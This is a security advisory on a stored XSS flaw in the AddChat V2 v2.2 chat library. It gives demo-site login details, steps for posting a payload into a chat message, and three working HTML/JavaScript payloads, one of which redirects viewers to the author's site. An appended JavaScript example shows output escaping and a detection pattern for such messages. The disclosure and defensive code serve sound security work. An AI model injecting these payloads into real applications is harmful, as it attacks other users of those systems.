/*!
* ::- Title: AddChat V2 - Realtime Chat Library v2.2 Stored XSS Injection
* ::- Author: m0ze
* ::- Date: 2019/06/25
* ::- Software: AddChat V2 - Realtime Chat Library v2.2
*/
::- Details & Description -::
~ Weak security measures, namely insufficient filtering of input field data, have been discovered in the «AddChat V2 - Realtime Chat Library». The current version of this web application is 2.2.
::- Demo Website -::
~ https://codecanyon.net/item/addchat-codeigniter-chat-plugin/20462938
~ Frontend: https://addchat.classiebit.com/
~ Backend: https://addchat.classiebit.com/user/login
~ Login & Password: johndoe / johndoe
::- Special Note -::
~ -
::- Google Dork -::
~ -
::- PoC Links -::
~ -
::- PoC [Stored XSS Injection] -::
~ Go to the demo website https://addchat.classiebit.com/user/login and log in with the provided credentials (johndoe / johndoe), then open the chat window by clicking the «Chat» icon in the bottom right corner. Select any user from the list, enter your payload in the input field, then press the «Send Message» button.
~ Example #1: <img src=https://i.imgur.com/zRm8R9z.gif onload=alert(`m0ze`);>
~ Example #2: <img src=x onerror=window.location.replace('https://m0ze.ru/');>
~ Example #3: <!--<img src="--><img src=x onerror=(alert)(`m0ze`)//">
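~ Added example, not code from the AddChat library: a rendering path that encodes every chat message as text before it reaches the chat window, plus a storage-time screen that flags messages shaped like the payloads above. The function and pattern names are hypothetical, and the sample messages are constructed from the three examples in this advisory.

```javascript
// Added example (not AddChat code): chat messages are treated as text, never
// as HTML, both when they are stored and when they are rendered.

// Characters that can open markup or break out of an attribute value.
const HTML_ESCAPES = {
  "&": "&amp;", "<": "&lt;", ">": "&gt;",
  '"': "&quot;", "'": "&#39;", "`": "&#96;",
};

function escapeHtml(text) {
  return String(text).replace(/[&<>"'`]/g, (ch) => HTML_ESCAPES[ch]);
}

// Build the fragment a chat window would insert. The body is escaped, so the
// browser only ever sees it as text. In a real page, `node.textContent = message`
// gives the same guarantee without any string building.
function renderMessage(message) {
  return '<div class="msg">' + escapeHtml(message) + "</div>";
}

// Storage-time screen: flag anything that looks like a tag, an inline event
// handler or a javascript: URL so it can be logged and rejected. This is a
// detection aid only; output encoding above is what actually prevents the XSS.
const MARKUP_PATTERN = /<\s*\/?[a-z!]|\bon[a-z]+\s*=|javascript\s*:/i;

function looksLikeMarkup(message) {
  return MARKUP_PATTERN.test(message);
}

// Check that a rendered fragment carries no tag other than the wrapper we emit.
function containsForeignTag(fragment) {
  const body = fragment.slice('<div class="msg">'.length, -"</div>".length);
  return /[<>]/.test(body);
}

// Constructed sample messages: one benign line plus the three payloads above.
const SAMPLES = [
  "hi, is the order ready?",
  "<img src=https://i.imgur.com/zRm8R9z.gif onload=alert(`m0ze`);>",
  "<img src=x onerror=window.location.replace('https://m0ze.ru/');>",
  '<!--<img src="--><img src=x onerror=(alert)(`m0ze`)//">',
];

// Screen and render every sample; returns what a log or test would inspect.
function screen(messages) {
  return messages.map((m) => ({ flagged: looksLikeMarkup(m), rendered: renderMessage(m) }));
}
```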